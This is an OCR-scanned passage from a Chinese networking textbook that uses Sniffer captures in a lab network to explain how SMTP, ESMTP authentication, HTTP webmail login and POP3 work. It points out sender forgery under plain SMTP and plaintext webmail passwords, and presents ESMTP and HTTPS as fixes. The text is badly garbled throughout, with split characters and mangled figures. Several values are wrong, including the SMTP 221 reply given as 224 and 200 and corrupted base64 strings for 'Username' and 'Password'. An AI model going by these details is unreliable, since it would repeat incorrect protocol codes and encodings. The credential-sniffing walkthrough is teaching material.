人 @PoPa6 件 | 辐 


zo0.0N5 1 xs | 回 


图 9-6 ”Mike 邮箱 界面 


在 主机 C 注册 账户 Peter(peter@ccpc. com)。 在 主机 A 的 易 邮 邮件 服务 器 窗口 中 ， 
可 看 到 Mike 和 Peter 这 两 个 账户 的 信息 ( 见 图 9-7)。 
在 主机 BB 启动 Outlook ,配置 Mike 账户 ,电子 邮件 地 址 为 mike@ ccpc. com, 接 收 邮 
件 服务 器 和 发 送 邮件 服务 器 为 主机 A 的 IP 地 址 192. 168. 111. 3。 在 主机 B 使 用 Mike 
的 账户 给 Peter 发 邮件 。 邮 件 发 出 后 ,这 封 邮 件 被 保存 在 主机 A 的 邮件 服务 器 上 。 
同样 ,在 主机 C 启动 Outlook, 配 置 Peter 账户 ,电子 邮件 地 址 为 peter@ccpc. com , 接 
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收 邮 件 服务 器 和 发 送 邮 件 服务 器 为 主机 A 的 IP 地 址 192. 168. 111. 3。 在 主机 C 使 用 
Outlook 接收 到 Mike 给 Peter 发 来 的 邮件 。 


备 易 邮 邮件 服务 器 
操作 @) 账号 和 工具 CI) 帮助 中 
| ee 红 群 发 ”加 报表 | 好 注册 站 隐 丫 ”项 关 闭 


2012/04/08 09:12.19 ”| 允许 | Atninistr 
2012708720 14:55:07 允许 
2012704713 09:37:35 允许 


[2012-08-20 14:09:49] 邮件 服务 系统 启动 . 
[2012-08-20 14:55:06] POP3 WebMail mike:192.168.111.1 
[2012-08-20 14:55;07] POP3 WebMail mike:192.168.111.1 


Q adnin8ccpc. com 厅 


图 9-7 易 邮 邮件 服务 器 窗口 中 Mike 和 Peter 账户 的 信息 


_ 83 利用 Sniffer 学 习 发 送 邮件 的 通信 过 程 


下 面 首先 学 习 电 子 邮 件 的 格式 。Mike 给 Peter 发 送 一 封 电子 邮件 ,分 为 两 大 部 分 ， 
信封 部 分 和 报 文部 分 ( 见 图 9-8)。 信 封 部 分 标识 发 送 方 邮箱 和 接收 方 邮 箱 ; 报 文部 分 分 
为 首部 和 主体 ,首部 包含 发 送 方 和 接收 方 用 户 名 ,发 送 的 时 间 和 邮件 主题 ,主体 部 分 为 邮 
件 正 文 内 容 。 


Mail From: mick(@Occpc.com 


RCPT To: peter@ccpc.com | 信封 


From: Mike 
To: Peter 
Date: 13/4/12 首部 
Subject: Network 报 广 


We want to inform you 
that our network is working 
properly 


主体 


图 9-8 电子 邮件 格式 


Outlook 发 送 电子 邮件 使 用 的 是 SMTP。SMTP 发 送 邮 件 的 过 程 是 使 用 一 些 命令 和 
pic es 客户 机 向 邮件 服务 器 发 送 一 条 命令 ,邮件 服务 器 
根据 命令 内 容 返 回响 应 值 。 这 样 ,命令 和 响应 交替 进行 ,完成 电子 邮件 的 收发 。 

下 面 介绍 SMTP es 客户 发 给 服务 器 的 是 命令 ,命令 的 格式 如 下 : 
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命令 : 命令 参数 。 
上 用 站 有 如 表 9-1 所 示 的 几 条 。 
表 9-1 发 送 邮 件 的 常用 命令 


命 令 含义 
HELO: 发 送 端 计算 机 名 邮件 发 往 的 计算 机 
MAIL FROM: 发 信人 邮件 地 址 发 信人 邮件 的 地 址 
RCPT TO: 收 信 人 邮件 地 址 收 信人 的 邮件 地 址 
DATA 将 要 传送 邮件 的 正文 
QUIT 退出 命令 


服务 器 发 送 给 客户 的 是 响应 ,由 三 位 十 进 制 数组 成 。 常 用 的 响应 有 如 表 9-2 所 示 的 
几 条 。 


表 9-2 发 送 邮件 的 常用 响应 


响应 代码 含义 
220 服务 器 SMTP 服务 准备 就 绪 
250 客户 请 求 的 命令 成 功 完成 
354 客户 可 以 开始 发 送 邮件 了 
224 服务 功能 已 经 关闭 (与 客户 发 送 QUIT 命令 对 应 


SMTP 发 送 电子 邮件 的 通信 过 程 与 TCP 连接 的 过 程 类 似 , 分 为 三 个 阶段 : 建立 连 
接 、. 邮 件 传送 、 终 止 连接 。SMTP 是 应 用 层 协 议 ,TCP 是 传输 层 的 协议 ,SMTP 在 传输 层 
就 是 基于 TCP, 因 此 ,SMTP 建立 连接 一 定 有 TCP 三 次 握手 。 

SMTP 建立 连接 的 过 程 ,最 先是 建立 TCP 连接 ,使 用 TCP 三 次 握手 ,服务 器 端 是 25 
号 端口 ,客户 端 使 用 的 是 大 于 1024 的 随机 端口 。TCP 连接 建立 以 后 ,对 于 TCP 连接 来 
说 是 数据 通信 阶段 ,对 于 邮件 传递 来 说 就 是 建立 邮件 连接 的 阶段 。 

如 图 9-9 所 示 ,首先 服务 器 返回 一 个 220 响应 ,代表 服务 器 SMTP 服务 准备 就 绪 , 这 
个 响应 报 文 里 携带 了 邮件 服务 器 类 型 以 及 邮件 服务 器 支持 的 协议 。 客 户 机 收 到 这 个 响应 
之 后 ,会 返回 一 个 HELO 命令 ,冒号 后 面 的 参数 是 客户 机 的 名 称 。 服 务 器 收 到 这 个 命令 
之 后 ,返回 250 响应 ,表示 服务 器 成 功 地 接收 了 这 条 命令 。 这 时 客户 机 和 服务 器 之 间 传 递 
的 两 条 响应 和 一 条 命令 就 建立 了 邮件 连接 。 

接 下 来 ,第 二 阶段 是 邮件 传送 阶段 ( 见 图 9-10) 。 客 户 机 给 服务 器 发 送 MAIL FROM 
命令 ,携带 了 客户 机 发 信人 的 邮件 地 址 通知 给 邮件 服务 器 。 服 务 器 收 到 后 ,在 自己 保存 的 
账户 信息 中 ,查找 是 否 有 Mike 这 个 邮件 账户 。 如 果 服 务 器 上 没有 Mike 这 个 邮件 账户 ， 
就 会 返回 一 个 提示 出 错 的 响应 ,通信 结束 。 如 果 服 务 器 有 Mike 这 个 邮件 账户 ,服务 器 返 
回 250 响应 ,表示 服务 器 成 功 地 接收 了 客户 机 发 来 的 MAIL FROM 命令 。 然 后 ,客户 机 
发 出 第 二 条 命令 RCPT TO, 后 面 的 参数 指明 了 接收 方 的 邮箱 地 址 。 如 果 邮 件 服务 器 上 
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存在 Peter 的 账户 ,服务 器 返回 250 响应 ,表示 邮件 服务 器 成 功 地 执行 了 这 条 RCPT TO 
命令 。 此 时 ,邮件 服务 器 已 经 得 到 了 发 送 方 的 邮件 地 址 和 接收 方 的 邮件 地 址 ,也 就 是 邮件 
的 信封 内 容 。 

客户 服务 器 
让 MAILL FROM: mike@ccpc.com “上 一 | 


一- 250(OK) oo 


(eT RCPT TO: peter@ccpc.com | 一 | 


-1 250(OK) | 


DATA 上 一 | 


- 354( 开 始 输入 邮件 ) 六 


FROM:Mike 


客户 有 有 务 器 TO:Peter 
= Date:13/4/2012 上 一 | 


Subject:mail 


200( 服 务 就 绪 ) 
HELLO: mike-pc 


This is a mail 


-一 -| . 上 -一 | 


-| 250(OK) 站 


时 间 时 间 1 1 
图 9-9 邮件 连接 建立 阶段 图 9-10 邮件 传送 阶段 


250(OK) 


接 下 来 ,传递 邮件 报 文部 分 。 客 户 机 给 服务 器 发 出 DATA 命令 ,通知 服务 器 接 下 来 
要 传递 邮件 报 文 部 分 。 服 务 器 收 到 DATA 命令 以 后 ,返回 354 响应 ,通知 客户 机 可 以 开 
始 输入 邮件 报 文 。 邮 件 报 文 包 括 首 部 和 报 文 主体 两 部 分 。 邮 件 报 文 首部 包括 发 信人 的 账 
户 名 称 , 收 信人 的 账户 名 称 、 传 递 邮 件 的 日 期 .邮件 主题 等 信息 。 邮 件 报 文 首部 的 后 面 就 
是 邮件 主体 部 分 。 

客户 机 的 邮件 报 文 传送 完毕 以 后 ,客户 机 还 要 给 服务 器 传送 一 个 主体 是 一 个 点 的 报 
文 , 代 表 客 户 机 发 送 的 邮件 报 文 传递 完成 。 当 服务 器 收 到 这 个 点 的 报 文 后 ,就 会 给 客户 机 
返回 一 个 250 响应 ,表示 成 功 接收 了 这 个 邮件 报 文 。 

这 是 发 送 邮 件 的 第 二 个 阶段 一 一 邮件 的 传送 阶段 。 

接 下 来 是 发 送 邮件 的 第 三 个 阶段 一 一 邮件 客户 服务 器 
连接 终止 阶段 ( 见 图 9-11)。 客 户 向 服务 器 发 送 
一 个 QUIT 命令 ,服务 器 返回 一 个 221 响应 , 表 Ce 
示 邮 件 服务 器 的 服务 功能 关闭 。 这 就 是 终止 连 221( 服 务 关闭 ) 
接 阶段 。 

这 样 ,发送 邮件 的 三 个 阶段 就 完成 了 。 然 ”时 间 时 间 
后 后 面 还 有 释放 TCP 连接 的 四 次 挥手 。 实 际 图 9-11 邮件 连接 终止 阶段 
上 ,邮件 传送 的 三 个 阶段 ,就 是 TCP 连接 的 第 二 
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个 阶段 ,数据 传送 的 阶段 。 

下 面 使 用 Sniffer 分 析 SMTP 发 送 邮件 的 过 程 。 在 发 送 邮件 的 客户 机 ,启动 Sniffer 
开始 监听 ,使 用 Outlook 从 Mike 账户 给 Peter 发 送 邮 件 ,Sniffer 停止 监听 ,查看 捕捉 到 的 
报 文 。 下 面 根据 Sniffer 捕捉 到 的 报 文 分 析 发 送 邮件 的 三 个 阶段 。 

如 图 9-12 所 示 ,前 三 个 报 文 是 建立 TCP 连接 的 三 次 握手 ,发 送 邮件 的 主机 作为 客户 
机 ,邮件 服务 器 作为 服务 器 。 客 户 机 的 端口 是 1024 以 上 的 随机 端口 ,服务 器 的 端口 是 
SMTP 的 25 端口 。 接 下 来 的 TCP 连接 数据 传送 阶段 包含 邮件 传送 的 三 个 阶段 ,都 是 在 

一 对 端口 中 完成 的 。 


D=1106 S=25 SYN ACK=3084437403 SEQ=2491782933 LEN=0 WIN=64240 


TCP 
2 168 .111 3]|TCP: D=25 S=1106 ACK=2491782934 WIN=65535 


图 9-12 Sniffer 捕捉 到 的 建立 TCP 连接 三 次 握手 的 报 文 


在 邮件 传送 的 第 一 个 阶段 邮件 连接 建立 阶段 ,由 三 个 报 文 组 成 。 首 先 ， oe 
个 220 响应 ,表示 服务 器 SMTP 服务 准备 就 绪 。 客 户 机 收 到 220 响应 后 ,会 返回 一 
HELO 命令 报 文 ,冒号 后 面 是 客户 机 名 称 Mike。 然 后 ,服务 器 给 客户 一 个 250 eng 
服务 器 成 功 地 接收 了 这 条 命令 。 


ET 山 TIT ke SHIP. R FORT-1105 | 
5 | Mike [192.168.111.3]|SMTP: C PORT=1106 HELO Mike 
SMTP. R PORT*1106 250 velcone here 


图 9-13 Sniffer 捕捉 到 的 邮件 连接 建立 阶段 的 三 个 报 文 


接 下 来 是 邮件 传送 阶段 ,包括 一 系列 报 文 ( 见 图 9-14)。 客 户 机 给 服务 器 发 送 MAIL 
FROM 命令 ,携带 了 客户 机 发 信 方 Mike 的 邮件 地 址 。 服 务 器 收 到 后 ,返回 250 响应 。 然 
后 ,客户 发 出 RCPT TO 命令 ,指明 了 接收 方 Peter 的 邮箱 地 址 。 服 务 器 还 是 返回 250 响 
应 。 这 部 分 是 邮件 的 信封 , 接 下 来 传递 邮件 报 文部 分 。 客 户 机 给 服务 器 发 出 DATA 命 
令 , 通 知 服务 器 将 要 传送 邮件 的 正文 部 分 。 服 务 器 收 到 DATA 命令 以 后 ,返回 354 响应 
通知 客户 机 可 以 开始 输入 邮件 ,并 且 以 *， ”结束 。 接 着 ,客户 机 传送 邮件 报 文 Text Data， 
这 里 包含 邮件 的 正文 内 容 。 然 后 ,服务 器 发 给 客户 机 一 个 TCP 的 确认 报 文 ,确认 刚才 客 
户 机 发 送 的 包含 邮件 内 容 的 报 文 已 经 正确 接收 。 接 着 ,客户 给 服务 器 传送 一 个 Text Data 
报 文 ,这 个 报 文 的 内 容 就 是 一 个 *“。”( 见 图 9-15) ,代表 邮件 正文 传递 完成 。 服 务 器 给 客 
户 机 返回 一 个 250 响应 。 a 


[192.168.111.3]/SMIE, C PORT=1106 MAIL FROM: 《AIKEGCCPC COR7 
站 各 168.111.3] Me SMTP: R PORT=1106 250 OK 
Mike [192.168.111.3]|SMTP: C PORT=1106 RCPT TO: <peter@ccpc.con> 
{192.168.111.3] Hike SMTP: R PORT=1106 250 OK 
1 | Mike [192.168.111.3]|SMTP: C PORT=1106 DATA 
县 名 168.111.3] Mike SMTP 人 本 354 send the mail data，end with 
3 Mike [192.168.111.3]|SMTP JRT=1106 Text Data 
[192.168.111.3]|Mike TCP pe 208 S=25 ACK=3084438693 WIN=62950 
Mike [192.168.111.3]|SMTP: C PORT=1106 Text Data 
[132 .168 .111.31 Mike SMTP: R PORT=1106 250 


图 9-14 Sniffer 捕 提 到 的 邮件 传送 阶段 的 报 文 


展开 包含 邮件 正文 内 容 的 Text Data 报 文 ,看 它 的 SMTP 层 ( 见 图 9-16) ,这 里 包含 
Message-ID ,发 信人 邮箱 地 址 (From: "Mike" 二 mike@ccpc. com 二) . 收 信 人 的 邮箱 地 址 
(To: 二 peter@ccpc. com 二 ) .邮件 主题 CSubject) 、 传 递 邮 件 的 日 期 (Data)、MIME( 通 用 
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e Mail Tra 


B SMTP: Line 1: 
SMTP: Line 2 
LY SMTP: 


图 9-15 ”Sniffer 捕 提 到 的 只 包含 一 个 “。 ”的 报 文 


因特网 邮件 扩充 ) 版 本 (MIME-Version)、 内 容 类 型 (Content-Type)、 内 容 传 送 编码 
(Content-Transfer-Encoding) 等 的 一 些 邮 件 信息 。 


[可 SMTP; 一 一 ”Sinple Mail Transfer Protocol 一 -一 
最 SMTP 


329D44D4ACA44B61B 


1 
mn Line 2: Fron nike@ccpc .com> 
SMTP: Line 3: To: ¢peter@ccpc.com> 
SMTP: Line 4: Subject: Hello 
BSMTP: Line 5: Date: Tue. 21 aug 2012 15:20:13 +0800 
SMTP: Line 6: MIME-Version: 1.0 
SMTP: Line 7: Content-Type: multipart/alternative; 
SMTP: Line 8: <«09>boundary="-———=_NextPart_000_000F_01CD7FB0.763F1630" 
SMTP: Line 9: X-Priority: 3 
BY SMTP: Line 10: X-MSMail-Priority: Nornal 
SMTP: Line 11: X-Mailer: Microsoft Outlook Express 6.00.2900.5931 
BY SMTP: Line 12: X-MimeOLE; Produced By Microsoft MimeOLE V6.00.2900.6157 
SMTP: Line 13 
DB SMTP: Line 14: This is a multi-part message in MIME fornat. 
BB SMTP: Line 15 
BY SMTP: Line 16: 一 一 一 = _NextPart_000_000F_01CD7FBO .763F1630 
GB SMTP: Line 17: Content-Type: text/plain; 
BY SMTP: Line 18: «09>charset="gb2312" 
SMTP: Line 19: Content-Transfer-Encoding: base64 
BY SMTP: Line 20 
SMTP: Line 21: SGkhIFBldGVy 
SMTP: Line 22 
局 SMTP: Line 23: ~-----=_ NextPart_000_000F_01CD7FB0.763F1630 


图 9-16 ”Text Data 报 文 的 SMTP 层 信息 


对 于 任意 的 二 进 制 文件 一 般 都 用 base64 编码 ,因此 邮件 的 内 容 也 使 用 base64 编码 。 
在 base64 编码 类 型 的 后 面 就 是 邮件 的 正文 内 容 。 由 于 使 用 了 base64 编码 ,邮件 正文 看 
上 去 是 一 串 乱 码 , 可 以 使 用 CodeView 乱码 查看 器 解析 出 真正 的 正文 内 容 ( 见 图 9-17)。 


| 纺 3: mg We QP 二 | 解 取 : MME WE QF 并 ML 其 地 自动 || 打 开 保存 
| % 丁克 | | m3i 执 : HTc5-yX68 op-yaI65 | | 选项 ” 示例” 关于 | 厂 ” ”” ”二 | 返回 护 


沽 窗口 ( 只要 接 动 文件 至 此 即 可 在 源 窗口 中 打开 ) 


SGkhIFB1dGYy 


结果 窗口 ( 只 要 抢 动 文件 至 此 即 可 在 结果 窗口 中 打开 ) 


HB! Peter 


了 任何 疙 见 和 建议 诗 与 我 圈 系 | Wilte:smstaasbell. com cn | http://dxqsoft. yeah net 


图 9-17 使 用 CodeView 解析 邮件 正文 内 容 


邮件 传送 的 第 三 个 阶段 是 邮件 的 终止 连接 阶段 ( 见 图 9-18)。 客 户 向 服务 器 发 送 一 
个 QUIT 命令 ,服务 器 返回 一 个 221 响应 ,表示 SMTP 服务 功能 关闭 。 到 此 ,传递 这 封 邮 
件 的 三 个 阶段 就 完毕 了 。 接 着 后 面 还 有 释放 TCP 连接 的 四 次 挥手 的 过 程 ( 见 图 9-19) 。 
这 样 ,整个 发 送 邮件 的 通信 过 程 就 结束 了 。 

从 以 上 Sniffer 捕 提 到 的 发 送 邮件 整个 过 程 的 报 文 , 可 以 分 析出 SMTP 的 一 个 缺点 ， 
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117 Mike | [192 168.111.3]|SMTP: C PORT=1106 QUIT 
18| [192.168.111.3]Mike SMTP: R PORT=1106 221 SMTP SERVICE CLOSED 


图 9-18 Sniffer 捕捉 到 的 终止 邮件 连接 的 两 个 报 文 


191T192 168 -111 3][Mike TCP: D=1106 S=25 FIN ACK=3084438704 SEQ=2491783096 LEN=0 WIN=62939 
20 Nike [192.168.111.3]|TCP; D=25 S=1106 ACK=2491783097 也 

Mike [192.168.111.3] 还 De 等 S-1106 FIN ACK=2431783037 SEQ=3084438704 LEN=0 WIN-65373 
[192 .168 111 3]/Mike TCP 106 S=25 ACK=3084438705 WIN=62939 


图 9-19 Sniffer 捕捉 到 的 释放 TCP 连接 四 次 挥手 的 报 文 


21 
22 


就 是 发 信 时 不 需 传送 邮件 用 户 名 和 密码 给 邮件 服务 器 确认 ,也 就 是 邮件 服务 器 对 发 信人 
的 身份 不 验证 ,这 样 可 能 导致 有 人 伪造 发 信人 身份 发 邮件 。 例 如 ,只 要 知道 Mike 的 邮件 
地 址 ,而 不 知道 邮箱 密码 ,使 用 Outlook 利用 SMTP 同样 可 以 以 Mike 的 身份 发 邮件 。 收 
信 方 也 能 够 收 到 这 封 冒 充 Mike 发 来 的 邮件 。 假 如 这 份 邮件 含有 病毒 或 木马 , 收 信人 就 
会 认为 是 Mike 发 来 的 病毒 或 木马 。 

怎样 对 发 信人 进行 身份 验证 呢 ? 这 就 需要 在 建立 邮件 连接 之 后 ,进行 发 信人 身份 验 
证 。 由 发 信人 提供 用 户 名 和 密码 让 服务 器 进行 确认 ,只 有 服务 器 正确 确认 后 ,才能 接收 邮 
件 。 发 信 时 加 了 这 种 身份 验证 机 制 的 SMTP 称 为 ESMTP。 现 在 几乎 所 有 的 大 型 网 站 的 
邮箱 (如 163、 新 浪 、 搜 狐 ) 都 默认 使 用 ESMTP。 

我 们 使 用 的 邮件 服务 器 软件 易 邮 也 接受 ESMTP( 见 图 9-20)。 同 时 发 送 邮件 的 客户 
机 Outlook 配置 的 邮件 账户 也 需要 进行 修改 ,设置 “我 的 服务 器 要 求 身份 验证 ”( 见 
图 9-21) ,也 就 是 发 信 时 要 求 对 发 信人 的 身份 验证 。 

单 击 “发 送 接收 ”, 接 收 了 刚才 Peter 发 来 的 邮件 。 


个 作为 局 域 网 邮件 服务 器 

人 作为 互联 网 邮件 服务 器 

个 作为 局 城 网 / 氢 号 邮件 服务 器 

其 了 6 和 厂 允许 邮件 代理 
厂 作为 IT 服务 运行 


人 单 域名 
个 多 域名 


图 9-20 配置 易 邮 邮件 服务 器 为 支持 ESMTP 


下 面 使 用 Sniffer 分 析 ESMTP 发 送 邮 件 的 通信 过 程 。Mike 发 邮件 给 Peter, 启 动 
Sniffer 监听 发 件 过 程 ,捕捉 客户 机 与 服务 器 的 通信 报 文 ( 见 图 9-22) 。 

对 比 这 组 ESMTP 报 文 和 SMTP 报 文 。 首 先是 TCP 建立 连接 三 次 握手 , 接 下 来 是 
建立 邮件 连接 阶段 的 三 个 报 文 。 服 务 器 发 出 220 响应 ,客户 机 返回 EHLO 命令 报 文 , 冒 
号 后 面 是 客户 机 名 称 Mike。 这 里 把 SMTP 下 客户 机 的 HELO 命令 改变 成 了 EHLO 命 

令 ,表示 将 要 使 用 ESMTP 进行 发 信人 身份 验证 。 接 着 ,服务 器 给 客户 一 个 250 响应 , 表 
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礼 192. 168. 111. 3 属性 


棠 规 | 服务 器 | 连接 | 安全 | 高 级 | 
服务 器 信息 
我 的 邮件 接收 服务 器 是 时) |FOF3 服务 器 。 
接收 邮件 (POP3) (I): |192. 168.111.3 
发 送 邮件 (NTP) QD): |192. 168. 111.3 
接收 邮件 服务 器 
账户 名 @C): 
密码 到 ): er 
回 记 住 客 码 中 
口 使 用 安全 密码 验证 登录 G) 


图 9-21 配置 客户 机 的 Outlook 为 "我 的 服务 器 要 求 身份 验证 ” 


1 T192166-111 IT] [192 160 111.3]]TCF. De25 S*1249 SYN SEQ*1161440303 TENe0 WIN65535 

2 [192,168-111.3]|[192.168-111.1]|TCP: D=1249 S=25 SYN ACK=1161440384 SEQ=1604788464 LEN=0 VIN=64240 
3 [192,168-111.1]|[192.168.111.3]|TCP: D=25 S=1249 ACK=1604788465 WIN=65535 

4 [192.168.111.3]|[192.168.111.1]|SMTP: R PORT=1249 220 ESMTP <D2D7D3CAD3CABCFEB7FECEF1C6F7》 5.2.2004.02.18 
5 [192.168.111.1]|[192.168.111.3]|SMTP: C PORT=1249 EHLO Mike 

6 E392.169.111.3| |192.169.113 ,3SNTE: R PORT-1249 250 AUTHTOGIN 

7 [192.168.111.1]| [192.168.111.3]|SMTP: C PORT=1249 AUTH LOGIN 

8 [93-160 0 E192: T6011. | SE: 三 :PORT 1249 334 Woathbdné 

虽 192 168 11 92 168 111 3]|SMTP，C PORT=1249 

1 

11 |[192.168.11 92.168.111.3] SMTP: C PORT=1249 Text Data 


92.168.111.3]|SMTP; C PORT=1249 。 DATA 

92.168.111,1]|SMTP; R PORT=1249 354 send the nail data. end vith 
92.168.111,3]|SMTP; C PORT=1249 Text Data 

92.168 111.1] 天 ;Ack Too Long 

TCP: D=1249 S=25 ACK=1161441776 WIN=62848 

92.168.111.3]|SMTP: C PORT*1249 Text Data 

92.168.111.1] SMTP: R PORT*1249 250 

92.168.111.3]|SMTP: C PORT=1249 QUIT 

92.168.111.1] SMTP: R PORT=1249 221 SMTP SERVICE CLOSE! 

92.168.111 引 TP: D1249 $225 FTH ACK-1161441787 有 9-1604288695 ITEM"0 WIN-62937 
92.168.111 CK=1604788686 WV 

1243 FIN ACK=1604788686 SE0-1161441787 IEN=0 WIN=65315 


192,168.11 
192,168.11 
a 


92.168 11 
192.168 -11 


图 9-22 Sniffer 捕捉 的 ESMTP 下 发 送 邮件 的 通信 过 程 


示 请 求 的 操作 完成 。 

接 下 来 的 6 个 报 文 就 是 发 件 人 身份 验证 报 文 。 客 户 机 发 给 服务 器 AUTH LOGIN 
命令 ,表示 发 信人 身份 验证 开始 。 服 务 器 返回 334 响应 ,要 求 客户 机 发 送 邮 件 用 户 名 
(VXN1lcm5hbWU6 是 base64 编码 过 的 “Username”) 。 接 着 ,客户 机 把 用 户 名 Mike 经 过 
base64 编码 后 发 给 服务 器 请 求 认证 ,在 客户 机 发 给 服务 器 Text data 报 文 (第 9 个 报 文 ) 
的 SMTP 层 就 是 经 过 base64 编码 后 的 用 户 名 Mike。 服 务 器 返回 334 响应 ,表示 用 户 名 
验证 正确 ,请求 密码 验证 ( UGFzc3dvcemQ 是 base64 编码 过 的 “Password”) 。 接 着 客户 机 
把 经 过 base64 编码 的 密码 发 给 服务 器 请 求 认证 ,在 第 11 个 报 文 (也 是 客户 机 发 给 服务 器 
Text data 报 文 ) 的 SMTP 层 就 是 经 过 base64 编码 后 的 Mike 的 密码 。 然 后 ,服务 器 给 客 
户 一 个 235 响应 ,表示 服务 器 对 用 户 名 和 密码 的 验证 成 功 。 

ESMTP 在 密码 验证 成 功 后 剩 下 的 通信 过 程 就 与 SMTP 相同 了 。 由 于 ESMTP 比 
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SMTP 多 了 一 个 用 户 身份 验证 的 过 程 ,这 样 可 以 防止 伪造 邮件 的 发 生 。 

在 日 常生 活 中 ,不 仅 可 以 使 用 邮件 客户 端 收发 邮件 ,而 且 可 以 使 用 Web 收发 邮件 。 
Web 收发 邮件 使 用 的 是 HTTP。 下 面 使 用 Sniffer 分 析 Web 发 送 邮 件 的 通信 过 程 。 客 
户 机 启动 Sniffer 开始 监听 ,从 Web 登录 Mike 邮箱 发 送 邮 件 给 Peter, 停 止 Sniffer 查看 
捕 提 到 的 报 文 ( 见 图 9-23)。 


[192.168.111.3] |TCP: D=80 S=1320 SYN SEQ=4192801800 IEN=0 WIN=65535 
[192.168.111.1] |TCP p= 1320 Fe po SYN 人 并 4192801801 SEQ= OE IEN=0 WIN=64240 
192 168.111.3 Pp 29 =l =3250607313 VIN=655 

[192 T HTTP/1 1 


2 了 OSI 3 i SE 20 G 5 ha IT 1 
[192.168.111.1] |HTTP: R Borts1320 HTIP/1.1 Status=Moved Pernanently-149 bytes of content 
[192.168.111.3] |HTTP: C Port=1320 GET /nail/ HTTP/1.1 
[192.168.111 .1] (HTTP: R Port-1320 HITP/1 1 StatuerOK-3503 bytes of content 
[192.168.111.1] |HTTP; Continuation of frane 8 0 Bytes of data 
10 [192.168.111.3] De D=80 S=1320 ACK= S20 WIN=65535 
11 [192.168.111.1] Continuation of frame 8; 845 Bytes of da 
2 [192.168.111.3] WE C Port=1320 GET /mail/images/’nav 01.gif “rp 和 


图 9-23 Sniffer 捕捉 的 Web 登录 邮箱 的 报 文 


首先 是 建立 TCP 连接 的 三 次 握手 ,由 于 是 从 Web 登录 邮件 服务 器 ,因此 服务 器 的 端 
口 是 80 ,而 客户 机 的 端口 是 一 个 大 于 1024 的 随机 端口 。 接 着 是 一 系列 HTTP 报 文 ,客户 
机 传 给 服务 器 的 GET 命令 ,请求 邮 件 服务 器 的 网 页 ,邮件 服务 器 传 网 页 给 客户 机 。 由 于 
邮件 服务 器 的 网 页 都 是 ASP 网 页 ,ASP 网 页 提交 数据 的 命令 有 两 种 : GET 和 POST。 
如 果 客 户 机 在 浏览 器 地 址 栏 中 输入 网 页 地 址 传递 给 服务 器 这 种 提交 方式 ,客户 机 发 送 给 
服务 器 的 命令 是 GET, 如 请 求 邮 件 网 页 的 GET 命令 。 如 果 客 户 机 是 在 网 页 中 的 对 话 框 
输入 数据 提交 给 服务 器 这 种 方式 ,客户 机 使 用 的 命令 是 POST。 从 Web 登录 邮箱 是 在 对 
话 框 中 输入 用 户 名 和 密码 ,客户 机 是 以 POST 命令 的 形式 提交 数据 的 ,因此 需要 在 
Sniffer 捕捉 到 的 报 文 中 找到 含有 POST 命令 的 报 文 。 在 Sniffer 窗口 中 ,选择 显示 菜单 
中 的 “查找 帧 ” ,查找 摘要 文本 包含 POST 的 报 文 ( 见 图 9-24) 。 


人 铺 委 文 示 加 个 数据 ASCII 
个 细节 文本 ( 个 数据 Hex 入 
厅 对 应 大 小 写 
搜寻 方向 : 个 向 上 (向 的 


图 9-24 查找 摘要 文本 包含 POST 的 报 文 


查找 到 包含 POST 命令 的 报 文 后 ,发 现 这 个 报 文 是 客户 机 发 给 服务 器 的 报 文 。 在 报 
文 的 HTTP 层 Content 这 一 行 对 应 下 面 的 信息 就 是 Mike 邮箱 的 用 户 名 和 密码 
( 见 图 9-25)。 

客户 机 把 邮件 的 用 户 名 和 密码 提交 给 login. asp 网 页 ,这 个 网 页 会 用 提交 的 用 户 名 和 
密码 到 网 站 后 台数 据 库 检索 ,验证 用 户 名 和 密码 是 否 在 数据 库 中 有 对 应 项 。 如 果 有 对 应 
项 ,服务 器 会 返回 登录 成 功 的 信息 ,客户 机 就 可 以 看 到 Mike 邮箱 登录 后 的 界面 。 

由 于 HTTP 是 明文 协议 ,因而 Web 登录 邮箱 传送 的 用 户 名 和 密码 是 明文 的 。 明 文 
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哆 HTTP: 14: Content: (19 bytes of data) 


A HTTP 
Ch 


6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 n: Keep-Alive..C 


che ie 
4 50 53 45 53 53 4 4 44 42 ASPSESSIONIDC! 
ooo00310: 42 41 41 54 3d 4b 45 43 42 43 4e 4b 42 44 49 4d BAAT=KECBCNKBDIM 
公 44 41 46 43 48 4b 50 45 4d 4f 0d 0a 0d BFEADAFCHKPEMO 
Ia 日 5 72 3d 6d 69 6b 65 26 50 61 73 73 3d 
p0000340 ， 区 要 3 


图 9-25 ”Sniffer 捕捉 的 Web 登录 邮箱 的 用 户 名 和 密码 


的 用 户 名 和 密码 在 网 上 传送 很 不 安全 ,存在 安全 隐患 。 因 此 ,必须 加 密 传输 用 户 名 密码 ， 
就 需 使 用 HTTPS, 比 如 登录 QQ 邮箱 的 网 页 ,地 址 栏 显 示 的 就 是 https://mail. qq. com 
( 见 图 9-26) ;而 163 邮箱 使 用 的 是 SSL 协议 安全 登录 ( 见 图 9-27)。 这 两 种 邮箱 都 是 把 用 
户 提交 的 数据 进行 加 密 , 再 传送 给 邮箱 ,这 样 可 以 有 效 防止 黑客 监听 邮件 用 户 名 和 密码 ， 
保证 了 用 户 邮 箱 的 安全 。 


加 登录 Q9 邮 和 荐 - Windows Internet Explorer 
文件 @) 编辑) 查看 W) 收 罕 忆 ) 工具 J) 帮助 0 


@ 旨 -日 - 国 国 约 | 时 六 nx 加 | 包 - 登 回 - 


地址 D) | 恰 ] https://nail. aq com/cei-bin/loginpage? 


MGi QQ 邮箱 企业 邮箱 | 反馈 建议 | 帮助 中 心 | 腾讯 客服 


mail qq.com 


图 9-26 QQ 邮箱 的 登录 界面 


@163.com 


态 记 密码 了 ? 


口 两 周 内 自动 登录 区 SSL 安 全 登录 


EE =。 


图 9-27 163 信箱 的 登录 界面 


9.4 利用 Sniffer 学 习 接 收 邮件 的 通信 过 程 


POP3 是 一 个 非常 简单 的 邮件 读 取 协议 ,POP3 也 使 用 客户 /服务 器 工作 方式 。 在 接 
收 邮件 的 主机 运行 POP3 客户 程序 ,在 邮件 服务 器 运行 POP3 服务 器 进程 。POP3 服务 
器 接收 邮件 使 用 的 端口 是 110 端口 。 

Onutlook 接收 电子 邮件 使 用 的 是 POP3。POP3 接收 邮件 的 过 程 是 使 用 一 些 命令 和 
响应 在 客户 机 和 邮件 服务 器 之 间 传 送 ( 见 图 9-28) 。 首 先 ,服务 器 110 端口 和 客户 机 的 随 
机 端口 建立 TCP 连接 。 接 着 ,客户 机 向 服务 器 发 送 收 件 人 的 用 户 名 。 如 果 服 务 器 验证 确 
